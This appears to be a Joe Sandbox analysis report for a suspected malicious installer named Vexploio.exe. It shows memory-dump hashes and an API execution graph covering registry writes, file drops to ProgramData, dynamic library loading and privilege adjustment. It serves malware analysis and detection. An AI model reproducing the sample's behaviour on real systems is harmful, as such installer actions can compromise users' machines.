                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: LibraryLoad$ErrorLast
                              • String ID:
                              • API String ID: 3177248105-0
                              • Opcode ID: c232634b59630130778acbc9343e6e0e57809670ee13915b97e842923c637f87
                              • Instruction ID: 8f505b7184c17cafc939e142c78bdd53efe1961654e725b8cec8aa76ce55ddef
                              • Opcode Fuzzy Hash: c232634b59630130778acbc9343e6e0e57809670ee13915b97e842923c637f87
                              • Instruction Fuzzy Hash: B601D83E625722ABE3118A68DC48E4A3759BF057F1B530624F906E7184DB20D412C7D0
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\Vexplo\Vexploio.exe,00000104), ref: 351E4C1D
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: FileModuleName
                              • String ID: C:\ProgramData\Vexplo\Vexploio.exe$d4
                              • API String ID: 514040917-2017120005
                              • Opcode ID: 75aa51a093a0f45ad65d8b427504b23162833f8c5d8c46a092163996640db65f
                              • Instruction ID: 8d08f9930abd7b8df511ba30980b6b803a9663740f1be0e51dd1578bd64ecfde
                              • Opcode Fuzzy Hash: 75aa51a093a0f45ad65d8b427504b23162833f8c5d8c46a092163996640db65f
                              • Instruction Fuzzy Hash: E331C1B5A10B18FFEB12CF99D880D9EBBFDFB85350F104166E804A7240DBB09A41DB91

                              Execution Graph

                              Execution Coverage:5.8%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:1267
                              Total number of Limit Nodes:13
                              execution_graph 3295 402340 3302 402acb 3295->3302 3298 402acb 17 API calls 3299 40235a 3298->3299 3300 402acb 17 API calls 3299->3300 3301 402364 GetPrivateProfileStringA 3300->3301 3303 402ad7 3302->3303 3304 405fc2 17 API calls 3303->3304 3305 402af8 3304->3305 3306 402351 3305->3306 3307 40620a 5 API calls 3305->3307 3306->3298 3307->3306 3308 401d41 GetDlgItem GetClientRect 3309 402acb 17 API calls 3308->3309 3310 401d71 LoadImageA SendMessageA 3309->3310 3311 402957 3310->3311 3312 401d8f DeleteObject 3310->3312 3312->3311 3313 404a44 GetDlgItem GetDlgItem 3314 404a96 7 API calls 3313->3314 3328 404cae 3313->3328 3315 404b39 DeleteObject 3314->3315 3316 404b2c SendMessageA 3314->3316 3317 404b42 3315->3317 3316->3315 3319 404b79 3317->3319 3321 405fc2 17 API calls 3317->3321 3318 404d92 3320 404e3e 3318->3320 3324 404ca1 3318->3324 3330 404deb SendMessageA 3318->3330 3364 40403f 3319->3364 3325 404e50 3320->3325 3326 404e48 SendMessageA 3320->3326 3327 404b5b SendMessageA SendMessageA 3321->3327 3323 404b8d 3329 40403f 18 API calls 3323->3329 3386 4040a6 3324->3386 3337 404e62 ImageList_Destroy 3325->3337 3338 404e69 3325->3338 3342 404e79 3325->3342 3326->3325 3327->3317 3328->3318 3345 404d1f 3328->3345 3369 404992 SendMessageA 3328->3369 3346 404b9b 3329->3346 3330->3324 3335 404e00 SendMessageA 3330->3335 3332 404d84 SendMessageA 3332->3318 3334 404fe8 3334->3324 3343 404ffa ShowWindow GetDlgItem ShowWindow 3334->3343 3341 404e13 3335->3341 3337->3338 3339 404e72 GlobalFree 3338->3339 3338->3342 3339->3342 3340 404c6f GetWindowLongA SetWindowLongA 3344 404c88 3340->3344 3351 404e24 SendMessageA 3341->3351 3342->3334 3358 404eb4 3342->3358 3374 404a12 3342->3374 3343->3324 3347 404ca6 3344->3347 3348 404c8e ShowWindow 3344->3348 3345->3318 3345->3332 3346->3340 3350 404bea SendMessageA 3346->3350 3352 404c69 3346->3352 3355 404c26 SendMessageA 3346->3355 3356 404c37 SendMessageA 3346->3356 3368 404074 SendMessageA 3347->3368 3367 404074 SendMessageA 3348->3367 3350->3346 3351->3320 3352->3340 3352->3344 3353 404ef8 3359 404fbe InvalidateRect 3353->3359 3363 404f6c SendMessageA SendMessageA 3353->3363 3355->3346 3356->3346 3358->3353 3360 404ee2 SendMessageA 3358->3360 3359->3334 3361 404fd4 3359->3361 3360->3353 3383 40494d 3361->3383 3363->3353 3365 405fc2 17 API calls 3364->3365 3366 40404a SetDlgItemTextA 3365->3366 3366->3323 3367->3324 3368->3328 3370 4049f1 SendMessageA 3369->3370 3371 4049b5 GetMessagePos ScreenToClient SendMessageA 3369->3371 3372 4049e9 3370->3372 3371->3372 3373 4049ee 3371->3373 3372->3345 3373->3370 3400 405fa0 lstrcpynA 3374->3400 3376 404a25 3401 405efe wsprintfA 3376->3401 3378 404a2f 3379 40140b 2 API calls 3378->3379 3380 404a38 3379->3380 3402 405fa0 lstrcpynA 3380->3402 3382 404a3f 3382->3358 3403 404888 3383->3403 3385 404962 3385->3334 3387 404169 3386->3387 3388 4040be GetWindowLongA 3386->3388 3388->3387 3389 4040d3 3388->3389 3389->3387 3390 404100 GetSysColor 3389->3390 3391 404103 3389->3391 3390->3391 3392 404113 SetBkMode 3391->3392 3393 404109 SetTextColor 3391->3393 3394 404131 3392->3394 3395 40412b GetSysColor 3392->3395 3393->3392 3396 404142 3394->3396 3397 404138 SetBkColor 3394->3397 3395->3394 3396->3387 3398 404155 DeleteObject 3396->3398 3399 40415c CreateBrushIndirect 3396->3399 3397->3396 3398->3399 3399->3387 3400->3376 3401->3378 3402->3382 3404 40489e 3403->3404 3405 405fc2 17 API calls 3404->3405 3406 404902 3405->3406 3407 405fc2 17 API calls 3406->3407 3408 40490d 3407->3408 3409 405fc2 17 API calls 3408->3409 3410 404923 lstrlenA wsprintfA SetDlgItemTextA 3409->3410 3410->3385 3411 401746 3412 402acb 17 API calls 3411->3412 3413 40174d 3412->3413 3414 405b68 2 API calls 3413->3414 3415 401754 3414->3415 3415->3415 3416 401947 3417 402acb 17 API calls 3416->3417 3418 40194e lstrlenA 3417->3418 3419 40257d 3418->3419 3423 4025ca 3432 402aa9 3423->3432 3425 402642 3426 405bb1 ReadFile 3430 4025d4 3426->3430 3427 402644 3435 405efe wsprintfA 3427->3435 3429 402654 3429->3425 3431 40266a SetFilePointer 3429->3431 3430->3425 3430->3426 3430->3427 3430->3429 3431->3425 3433 405fc2 17 API calls 3432->3433 3434 402abe 3433->3434 3434->3430 3435->3425 3436 40224b 3437 402acb 17 API calls 3436->3437 3438 402251 3437->3438 3439 402acb 17 API calls 3438->3439 3440 40225a 3439->3440 3441 402acb 17 API calls 3440->3441 3442 402263 3441->3442 3443 4062a3 2 API calls 3442->3443 3444 40226c 3443->3444 3445 402270 3444->3445 3446 40227d lstrlenA lstrlenA 3444->3446 3447 4050c7 24 API calls 3445->3447 3448 4050c7 24 API calls 3446->3448 3450 402278 3447->3450 3449 4022b9 SHFileOperationA 3448->3449 3449->3445 3449->3450 3451 4028cb 3452 402aa9 17 API calls 3451->3452 3453 4028d1 3452->3453 3454 402906 3453->3454 3455 40271c 3453->3455 3457 4028e3 3453->3457 3454->3455 3456 405fc2 17 API calls 3454->3456 3456->3455 3457->3455 3459 405efe wsprintfA 3457->3459 3459->3455 3460 4022cd 3461 4022d4 3460->3461 3465 4022e7 3460->3465 3462 405fc2 17 API calls 3461->3462 3463 4022e1 3462->3463 3464 4056bc MessageBoxIndirectA 3463->3464 3464->3465 3466 4044d1 3467 4044fd 3466->3467 3468 40450e 3466->3468 3527 4056a0 GetDlgItemTextA 3467->3527 3470 40451a GetDlgItem 3468->3470 3474 404579 3468->3474 3473 40452e 3470->3473 3471 40465d 3525 404807 3471->3525 3529 4056a0 GetDlgItemTextA 3471->3529 3472 404508 3475 40620a 5 API calls 3472->3475 3476 404542 SetWindowTextA 3473->3476 3478 4059d1 4 API calls 3473->3478 3474->3471 3480 405fc2 17 API calls 3474->3480 3474->3525 3475->3468 3479 40403f 18 API calls 3476->3479 3484 404538 3478->3484 3485 40455e 3479->3485 3486 4045ed SHBrowseForFolderA 3480->3486 3481 40468d 3487 405a26 18 API calls 3481->3487 3482 4040a6 8 API calls 3483 40481b 3482->3483 3484->3476 3491 405938 3 API calls 3484->3491 3488 40403f 18 API calls 3485->3488 3486->3471 3489 404605 CoTaskMemFree 3486->3489 3490 404693 3487->3490 3492 40456c 3488->3492 3493 405938 3 API calls 3489->3493 3530 405fa0 lstrcpynA 3490->3530 3491->3476 3528 404074 SendMessageA 3492->3528 3495 404612 3493->3495 3498 404649 SetDlgItemTextA 3495->3498 3502 405fc2 17 API calls 3495->3502 3497 404572 3500 406338 5 API calls 3497->3500 3498->3471 3499 4046aa 3501 406338 5 API calls 3499->3501 3500->3474 3508 4046b1 3501->3508 3503 404631 lstrcmpiA 3502->3503 3503->3498 3506 404642 lstrcatA 3503->3506 3504 4046ed 3531 405fa0 lstrcpynA 3504->3531 3506->3498 3507 4046f4 3509 4059d1 4 API calls 3507->3509 3508->3504 3512 40597f 2 API calls 3508->3512 3514 404745 3508->3514 3510 4046fa GetDiskFreeSpaceA 3509->3510 3513 40471e MulDiv 3510->3513 3510->3514 3512->3508 3513->3514 3515 4047b6 3514->3515 3517 40494d 20 API calls 3514->3517 3516 4047d9 3515->3516 3518 40140b 2 API calls 3515->3518 3532 404061 EnableWindow 3516->3532 3519 4047a3 3517->3519 3518->3516 3521 4047b8 SetDlgItemTextA 3519->3521 3522 4047a8 3519->3522 3521->3515 3524 404888 20 API calls 3522->3524 3523 4047f5 3523->3525 3533 40442a 3523->3533 3524->3515 3525->3482 3527->3472 3528->3497 3529->3481 3530->3499 3531->3507 3532->3523 3534 404438 3533->3534 3535 40443d SendMessageA 3533->3535 3534->3535 3535->3525 3536 4020d1 3537 402acb 17 API calls 3536->3537 3538 4020d8 3537->3538 3539 402acb 17 API calls 3538->3539 3540 4020e2 3539->3540 3541 402acb 17 API calls 3540->3541 3542 4020ec 3541->3542 3543 402acb 17 API calls 3542->3543 3544 4020f6 3543->3544 3545 402acb 17 API calls 3544->3545 3546 402100 3545->3546 3547 402142 CoCreateInstance 3546->3547 3548 402acb 17 API calls 3546->3548 3551 402161 3547->3551 3553 40220c 3547->3553 3548->3547 3550 402242 3552 4021ec MultiByteToWideChar 3551->3552 3551->3553 3552->3553 3553->3550 3554 401423 3553->3554 3555 4050c7 24 API calls 3554->3555 3556 401431 3555->3556 3556->3550 3557 4026d4 3558 4026da 3557->3558 3559 4026de FindNextFileA 3558->3559 3562 4026f0 3558->3562 3560 40272f 3559->3560 3559->3562 3563 405fa0 lstrcpynA 3560->3563 3563->3562 3564 4014d6 3565 402aa9 17 API calls 3564->3565 3566 4014dc Sleep 3565->3566 3568 402957 3566->3568 3569 4023d6 3570 402acb 17 API calls 3569->3570 3571 4023e8 3570->3571 3572 402acb 17 API calls 3571->3572 3573 4023f2 3572->3573 3586 402b5b 3573->3586 3576 402427 3578 402433 3576->3578 3580 402aa9 17 API calls 3576->3580 3577 402acb 17 API calls 3579 402420 lstrlenA 3577->3579 3581 402452 RegSetValueExA 3578->3581 3582 402f9c 31 API calls 3578->3582 3579->3576 3580->3578 3583 402468 RegCloseKey 3581->3583 3582->3581 3585 40271c 3583->3585 3587 402b76 3586->3587 3590 405e54 3587->3590 3591 405e63 3590->3591 3592 402402 3591->3592 3593 405e6e RegCreateKeyExA 3591->3593 3592->3576 3592->3577 3592->3585 3593->3592 3594 401659 3595 402acb 17 API calls 3594->3595 3596 40165f 3595->3596 3597 4062a3 2 API calls 3596->3597 3598 401665 3597->3598 3599 401759 3600 402acb 17 API calls 3599->3600 3601 401760 3600->3601 3602 401786 3601->3602 3603 40177e 3601->3603 3638 405fa0 lstrcpynA 3602->3638 3637 405fa0 lstrcpynA 3603->3637 3606 401784 3610 40620a 5 API calls 3606->3610 3607 401791 3608 405938 3 API calls 3607->3608 3609 401797 lstrcatA 3608->3609 3609->3606 3614 4017a3 3610->3614 3611 4062a3 2 API calls 3611->3614 3612 405b14 2 API calls 3612->3614 3614->3611 3614->3612 3615 4017ba CompareFileTime 3614->3615 3616 40187e 3614->3616 3617 401855 3614->3617 3620 405fa0 lstrcpynA 3614->3620 3626 405fc2 17 API calls 3614->3626 3633 4056bc MessageBoxIndirectA 3614->3633 3639 405b39 GetFileAttributesA CreateFileA 3614->3639 3615->3614 3618 4050c7 24 API calls 3616->3618 3619 4050c7 24 API calls 3617->3619 3628 40186a 3617->3628 3621 401888 3618->3621 3619->3628 3620->3614 3622 402f9c 31 API calls 3621->3622 3623 40189b 3622->3623 3624 4018af SetFileTime 3623->3624 3625 4018c1 CloseHandle 3623->3625 3624->3625 3627 4018d2 3625->3627 3625->3628 3626->3614 3629 4018d7 3627->3629 3630 4018ea 3627->3630 3631 405fc2 17 API calls 3629->3631 3632 405fc2 17 API calls 3630->3632 3634 4018df lstrcatA 3631->3634 3635 4018f2 3632->3635 3633->3614 3634->3635 3636 4056bc MessageBoxIndirectA 3635->3636 3636->3628 3637->3606 3638->3607 3639->3614 3640 401959 3641 402aa9 17 API calls 3640->3641 3642 401960 3641->3642 3643 402aa9 17 API calls 3642->3643 3644 40196d 3643->3644 3645 402acb 17 API calls 3644->3645 3646 401984 lstrlenA 3645->3646 3648 401994 3646->3648 3647 4019d4 3648->3647 3652 405fa0 lstrcpynA 3648->3652 3650 4019c4 3650->3647 3651 4019c9 lstrlenA 3650->3651 3651->3647 3652->3650 3653 401cda 3654 402aa9 17 API calls 3653->3654 3655 401ce0 IsWindow 3654->3655 3656 401a0e 3655->3656 3657 401a5e 3658 402aa9 17 API calls 3657->3658 3659 401a67 3658->3659 3660 402aa9 17 API calls 3659->3660 3661 401a0e 3660->3661 3662 401f61 3663 402acb 17 API calls 3662->3663 3664 401f68 3663->3664 3665 406338 5 API calls 3664->3665 3666 401f77 3665->3666 3667 401f8f GlobalAlloc 3666->3667 3676 401ff7 3666->3676 3668 401fa3 3667->3668 3667->3676 3669 406338 5 API calls 3668->3669 3670 401faa 3669->3670 3671 406338 5 API calls 3670->3671 3672 401fb4 3671->3672 3672->3676 3677 405efe wsprintfA 3672->3677 3674 401feb 3678 405efe wsprintfA 3674->3678 3677->3674 3678->3676 3679 402561 3680 402acb 17 API calls 3679->3680 3681 402568 3680->3681 3684 405b39 GetFileAttributesA CreateFileA 3681->3684 3683 402574 3684->3683 3685 401563 3686 4028ff 3685->3686 3689 405efe wsprintfA 3686->3689 3688 402904 3689->3688 3690 401b63 3691 401b70 3690->3691 3692 401bb4 3690->3692 3695 4022d4 3691->3695 3700 401b87 3691->3700 3693 401bb8 3692->3693 3694 401bdd GlobalAlloc 3692->3694 3703 401bf8 3693->3703 3711 405fa0 lstrcpynA 3693->3711 3696 405fc2 17 API calls 3694->3696 3697 405fc2 17 API calls 3695->3697 3696->3703 3699 4022e1 3697->3699 3704 4056bc MessageBoxIndirectA 3699->3704 3709 405fa0 lstrcpynA 3700->3709 3701 401bca GlobalFree 3701->3703 3704->3703 3705 401b96 3710 405fa0 lstrcpynA 3705->3710 3707 401ba5 3712 405fa0 lstrcpynA 3707->3712 3709->3705 3710->3707 3711->3701 3712->3703 3713 4024e5 3723 402b0b 3713->3723 3716 402aa9 17 API calls 3717 4024f8 3716->3717 3718 40271c 3717->3718 3719 402513 RegEnumKeyA 3717->3719 3720 40251f RegEnumValueA 3717->3720 3721 402534 RegCloseKey 3719->3721 3720->3721 3721->3718 3724 402acb 17 API calls 3723->3724 3725 402b22 3724->3725 3726 405e26 RegOpenKeyExA 3725->3726 3727 4024ef 3726->3727 3727->3716 3728 40166a 3729 402acb 17 API calls 3728->3729 3730 401671 3729->3730 3731 402acb 17 API calls 3730->3731 3732 40167a 3731->3732 3733 402acb 17 API calls 3732->3733 3734 401683 MoveFileA 3733->3734 3735 401696 3734->3735 3736 40168f 3734->3736 3738 4062a3 2 API calls 3735->3738 3740 402242 3735->3740 3737 401423 24 API calls 3736->3737 3737->3740 3739 4016a5 3738->3739 3739->3740 3741 405d7f 36 API calls 3739->3741 3741->3736 3742 403b6b 3743 403b83 3742->3743 3744 403cbe 3742->3744 3743->3744 3745 403b8f 3743->3745 3746 403d0f 3744->3746 3747 403ccf GetDlgItem GetDlgItem 3744->3747 3748 403b9a SetWindowPos 3745->3748 3749 403bad 3745->3749 3751 403d69 3746->3751 3756 401389 2 API calls 3746->3756 3750 40403f 18 API calls 3747->3750 3748->3749 3753 403bb2 ShowWindow 3749->3753 3754 403bca 3749->3754 3755 403cf9 SetClassLongA 3750->3755 3752 40408b SendMessageA 3751->3752 3757 403cb9 3751->3757 3782 403d7b 3752->3782 3753->3754 3758 403bd2 DestroyWindow 3754->3758 3759 403bec 3754->3759 3760 40140b 2 API calls 3755->3760 3761 403d41 3756->3761 3762 403fc8 3758->3762 3763 403bf1 SetWindowLongA 3759->3763 3764 403c02 3759->3764 3760->3746 3761->3751 3765 403d45 SendMessageA 3761->3765 3762->3757 3773 403ff9 ShowWindow 3762->3773 3763->3757 3768 403c79 3764->3768 3769 403c0e GetDlgItem 3764->3769 3765->3757 3766 40140b 2 API calls 3766->3782 3767 403fca DestroyWindow EndDialog 3767->3762 3772 4040a6 8 API calls 3768->3772 3770 403c21 SendMessageA IsWindowEnabled 3769->3770 3771 403c3e 3769->3771 3770->3757 3770->3771 3775 403c4b 3771->3775 3776 403c92 SendMessageA 3771->3776 3777 403c5e 3771->3777 3785 403c43 3771->3785 3772->3757 3773->3757 3774 405fc2 17 API calls 3774->3782 3775->3776 3775->3785 3776->3768 3780 403c66 3777->3780 3781 403c7b 3777->3781 3779 40403f 18 API calls 3779->3782 3784 40140b 2 API calls 3780->3784 3783 40140b 2 API calls 3781->3783 3782->3757 3782->3766 3782->3767 3782->3774 3782->3779 3786 40403f 18 API calls 3782->3786 3802 403f0a DestroyWindow 3782->3802 3783->3785 3784->3785 3785->3768 3811 404018 3785->3811 3787 403df6 GetDlgItem 3786->3787 3788 403e13 ShowWindow EnableWindow 3787->3788 3789 403e0b 3787->3789 3814 404061 EnableWindow 3788->3814 3789->3788 3791 403e3d EnableWindow 3796 403e51 3791->3796 3792 403e56 GetSystemMenu EnableMenuItem SendMessageA 3793 403e86 SendMessageA 3792->3793 3792->3796 3793->3796 3795 403b4c 18 API calls 3795->3796 3796->3792 3796->3795 3815 404074 SendMessageA 3796->3815 3816 405fa0 lstrcpynA 3796->3816 3798 403eb5 lstrlenA 3799 405fc2 17 API calls 3798->3799 3800 403ec6 SetWindowTextA 3799->3800 3801 401389 2 API calls 3800->3801 3801->3782 3802->3762 3803 403f24 CreateDialogParamA 3802->3803 3803->3762 3804 403f57 3803->3804 3805 40403f 18 API calls 3804->3805 3806 403f62 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3805->3806 3807 401389 2 API calls 3806->3807 3808 403fa8 3807->3808 3808->3757 3809 403fb0 ShowWindow 3808->3809 3810 40408b SendMessageA 3809->3810 3810->3762 3812 404025 SendMessageA 3811->3812 3813 40401f 3811->3813 3812->3768 3813->3812 3814->3791 3815->3796 3816->3798 3817 4019ed 3818 402acb 17 API calls 3817->3818 3819 4019f4 3818->3819 3820 402acb 17 API calls 3819->3820 3821 4019fd 3820->3821 3822 401a04 lstrcmpiA 3821->3822 3823 401a16 lstrcmpA 3821->3823 3824 401a0a 3822->3824 3823->3824 3825 40156f 3826 401586 3825->3826 3827 40157f ShowWindow 3825->3827 3828 401594 ShowWindow 3826->3828 3829 402957 3826->3829 3827->3826 3828->3829 3830 402473 3831 402b0b 17 API calls 3830->3831 3832 40247d 3831->3832 3833 402acb 17 API calls 3832->3833 3834 402486 3833->3834 3835 402490 RegQueryValueExA 3834->3835 3840 40271c 3834->3840 3836 4024b0 3835->3836 3837 4024b6 RegCloseKey 3835->3837 3836->3837 3841 405efe wsprintfA 3836->3841 3837->3840 3841->3837 3842 4014f4 SetForegroundWindow 3843 402957 3842->3843 3844 404175 lstrcpynA lstrlenA 3845 401cfb 3846 402aa9 17 API calls 3845->3846 3847 401d02 3846->3847 3848 402aa9 17 API calls 3847->3848 3849 401d0e GetDlgItem 3848->3849 3850 40257d 3849->3850 3851 402c7c 3852 402c8b SetTimer 3851->3852 3854 402ca4 3851->3854 3852->3854 3853 402cf9 3854->3853 3855 402cbe MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3854->3855 3855->3853 3856 4022fc 3857 402304 3856->3857 3858 40230a 3856->3858 3859 402acb 17 API calls 3857->3859 3860 40231a 3858->3860 3861 402acb 17 API calls 3858->3861 3859->3858 3862 402acb 17 API calls 3860->3862 3865 402328 3860->3865 3861->3860 3862->3865 3863 402acb 17 API calls 3864 402331 WritePrivateProfileStringA 3863->3864 3865->3863 3866 4018fd 3867 401934 3866->3867 3868 402acb 17 API calls 3867->3868 3869 401939 3868->3869 3870 405768 67 API calls 3869->3870 3871 401942 3870->3871 3872 4026fe 3873 402acb 17 API calls 3872->3873 3874 402705 FindFirstFileA 3873->3874 3875 402728 3874->3875 3879 402718 3874->3879 3876 40272f 3875->3876 3880 405efe wsprintfA 3875->3880 3881 405fa0 lstrcpynA 3876->3881 3880->3876 3881->3879 3882 401000 3883 401037 BeginPaint GetClientRect 3882->3883 3884 40100c DefWindowProcA 3882->3884 3886 4010f3 3883->3886 3887 401179 3884->3887 3888 401073 CreateBrushIndirect FillRect DeleteObject 3886->3888 3889 4010fc 3886->3889 3888->3886 3890 401102 CreateFontIndirectA 3889->3890 3891 401167 EndPaint 3889->3891 3890->3891 3892 401112 6 API calls 3890->3892 3891->3887 3892->3891 3893 401900 3894 402acb 17 API calls 3893->3894 3895 401907 3894->3895 3896 4056bc MessageBoxIndirectA 3895->3896 3897 401910 3896->3897 3898 402381 3899 4023b3 3898->3899 3900 402388 3898->3900 3901 402acb 17 API calls 3899->3901 3902 402b0b 17 API calls 3900->3902 3903 4023ba 3901->3903 3904 40238f 3902->3904 3909 402b89 3903->3909 3906 4023c7 3904->3906 3907 402acb 17 API calls 3904->3907 3908 4023a0 RegDeleteValueA RegCloseKey 3907->3908 3908->3906 3910 402b95 3909->3910 3911 402b9c 3909->3911 3910->3906 3911->3910 3913 402bcd 3911->3913 3914 405e26 RegOpenKeyExA 3913->3914 3919 402bfb 3914->3919 3915 402c21 RegEnumKeyA 3916 402c38 RegCloseKey 3915->3916 3915->3919 3917 406338 5 API calls 3916->3917 3920 402c48 3917->3920 3918 402c59 RegCloseKey 3923 402c4c 3918->3923 3919->3915 3919->3916 3919->3918 3921 402bcd 6 API calls 3919->3921 3919->3923 3922 402c69 RegDeleteKeyA 3920->3922 3920->3923 3921->3919 3922->3923 3923->3910 3924 401502 3925 40150a 3924->3925 3927 40151d 3924->3927 3926 402aa9 17 API calls 3925->3926 3926->3927 3928 402003 3929 402015 3928->3929 3930 4020c3 3928->3930 3931 402acb 17 API calls 3929->3931 3932 401423 24 API calls 3930->3932 3933 40201c 3931->3933 3939 402242 3932->3939 3934 402acb 17 API calls 3933->3934 3935 402025 3934->3935 3936 40203a LoadLibraryExA 3935->3936 3937 40202d GetModuleHandleA 3935->3937 3936->3930 3938 40204a GetProcAddress 3936->3938 3937->3936 3937->3938 3940 402096 3938->3940 3941 402059 3938->3941 3942 4050c7 24 API calls 3940->3942 3943 401423 24 API calls 3941->3943 3944 402069 3941->3944 3942->3944 3943->3944 3944->3939 3945 4020b7 FreeLibrary 3944->3945 3945->3939 3946 402583 3947 402588 3946->3947 3948 40259c 3946->3948 3949 402aa9 17 API calls 3947->3949 3950 402acb 17 API calls 3948->3950 3952 402591 3949->3952 3951 4025a3 lstrlenA 3950->3951 3951->3952 3953 405be0 WriteFile 3952->3953 3954 4025c5 3952->3954 3953->3954 3955 405205 3956 4053b0 3955->3956 3957 405227 GetDlgItem GetDlgItem GetDlgItem 3955->3957 3958 4053e0 3956->3958 3959 4053b8 GetDlgItem CreateThread CloseHandle 3956->3959 4000 404074 SendMessageA 3957->4000 3962 40540e 3958->3962 3963 4053f6 ShowWindow ShowWindow 3958->3963 3964 40542f 3958->3964 3959->3958 3961 405297 3966 40529e GetClientRect GetSystemMetrics SendMessageA SendMessageA 3961->3966 3965 405469 3962->3965 3968 405442 ShowWindow 3962->3968 3969 40541e 3962->3969 4002 404074 SendMessageA 3963->4002 3970 4040a6 8 API calls 3964->3970 3965->3964 3973 405476 SendMessageA 3965->3973 3971 4052f0 SendMessageA SendMessageA 3966->3971 3972 40530c 3966->3972 3976 405462 3968->3976 3977 405454 3968->3977 3974 404018 SendMessageA 3969->3974 3975 40543b 3970->3975 3971->3972 3979 405311 SendMessageA 3972->3979 3980 40531f 3972->3980 3973->3975 3981 40548f CreatePopupMenu 3973->3981 3974->3964 3978 404018 SendMessageA 3976->3978 3982 4050c7 24 API calls 3977->3982 3978->3965 3979->3980 3984 40403f 18 API calls 3980->3984 3983 405fc2 17 API calls 3981->3983 3982->3976 3985 40549f AppendMenuA 3983->3985 3986 40532f 3984->3986 3987 4054d0 TrackPopupMenu 3985->3987 3988 4054bd GetWindowRect 3985->3988 3989 405338 ShowWindow 3986->3989 3990 40536c GetDlgItem SendMessageA 3986->3990 3987->3975 3991 4054ec 3987->3991 3988->3987 3992 40535b 3989->3992 3993 40534e ShowWindow 3989->3993 3990->3975 3994 405393 SendMessageA SendMessageA 3990->3994 3995 40550b SendMessageA 3991->3995 4001 404074 SendMessageA 3992->4001 3993->3992 3994->3975 3995->3995 3996 405528 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3995->3996 3998 40554a SendMessageA 3996->3998 3998->3998 3999 40556c GlobalUnlock SetClipboardData CloseClipboard 3998->3999 3999->3975 4000->3961 4001->3990 4002->3962 4003 402688 4004 402904 4003->4004 4005 40268f 4003->4005 4006 402aa9 17 API calls 4005->4006 4007 402696 4006->4007 4008 4026a5 SetFilePointer 4007->4008 4008->4004 4009 4026b5 4008->4009 4011 405efe wsprintfA 4009->4011 4011->4004 4012 401c0a 4013 402aa9 17 API calls 4012->4013 4014 401c11 4013->4014 4015 402aa9 17 API calls 4014->4015 4016 401c1e 4015->4016 4017 401c33 4016->4017 4018 402acb 17 API calls 4016->4018 4019 402acb 17 API calls 4017->4019 4023 401c43 4017->4023 4018->4017 4019->4023 4020 401c9a 4022 402acb 17 API calls 4020->4022 4021 401c4e 4024 402aa9 17 API calls 4021->4024 4025 401c9f 4022->4025 4023->4020 4023->4021 4026 401c53 4024->4026 4027 402acb 17 API calls 4025->4027 4028 402aa9 17 API calls 4026->4028 4029 401ca8 FindWindowExA 4027->4029 4030 401c5f 4028->4030 4033 401cc6 4029->4033 4031 401c8a SendMessageA 4030->4031 4032 401c6c SendMessageTimeoutA 4030->4032 4031->4033 4032->4033 4034 40448a 4035 4044c0 4034->4035 4036 40449a 4034->4036 4038 4040a6 8 API calls 4035->4038 4037 40403f 18 API calls 4036->4037 4039 4044a7 SetDlgItemTextA 4037->4039 4040 4044cc 4038->4040 4039->4035 2802 40320c SetErrorMode GetVersion 2803 40324d 2802->2803 2804 403253 2802->2804 2805 406338 5 API calls 2803->2805 2895 4062ca GetSystemDirectoryA 2804->2895 2805->2804 2807 403269 lstrlenA 2807->2804 2808 403278 2807->2808 2898 406338 GetModuleHandleA 2808->2898 2811 406338 5 API calls 2812 403286 2811->2812 2813 406338 5 API calls 2812->2813 2814 403292 #17 OleInitialize SHGetFileInfoA 2813->2814 2904 405fa0 lstrcpynA 2814->2904 2817 4032de GetCommandLineA 2905 405fa0 lstrcpynA 2817->2905 2819 4032f0 2906 405963 2819->2906 2822 4033f3 2823 403406 GetTempPathA 2822->2823 2910 4031db 2823->2910 2825 40341e 2828 403422 GetWindowsDirectoryA lstrcatA 2825->2828 2829 403478 DeleteFileA 2825->2829 2826 405963 CharNextA 2827 403329 2826->2827 2827->2822 2827->2826 2832 4033f5 2827->2832 2831 4031db 12 API calls 2828->2831 2920 402d63 GetTickCount GetModuleFileNameA 2829->2920 2834 40343e 2831->2834 2961 405fa0 lstrcpynA 2832->2961 2834->2829 2837 403442 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 2834->2837 2835 403526 2950 4036f4 2835->2950 2838 4031db 12 API calls 2837->2838 2841 403470 2838->2841 2839 403512 2979 4037ce 2839->2979 2841->2829 2841->2835 2843 405963 CharNextA 2846 4034a7 2843->2846 2845 403522 2845->2835 2856 403552 2846->2856 2857 4034ed 2846->2857 2847 40365a 2849 403662 GetCurrentProcess OpenProcessToken 2847->2849 2850 4036dc 2847->2850 2848 40353c 2957 4056bc 2848->2957 2852 4036ad 2849->2852 2853 40367d LookupPrivilegeValueA AdjustTokenPrivileges 2849->2853 2854 4036e6 2850->2854 2855 4036ea ExitProcess 2850->2855 2859 406338 5 API calls 2852->2859 2853->2852 2854->2855 3035 405627 2856->3035 2962 405a26 2857->2962 2863 4036b4 2859->2863 2868 4036c9 ExitWindowsEx 2863->2868 2871 4036d5 2863->2871 2865 4034fc 2977 405fa0 lstrcpynA 2865->2977 2866 403573 lstrcatA lstrcmpiA 2866->2835 2870 40358f 2866->2870 2867 403568 lstrcatA 2867->2866 2868->2850 2868->2871 2873 403594 2870->2873 2874 40359b 2870->2874 3072 40140b 2871->3072 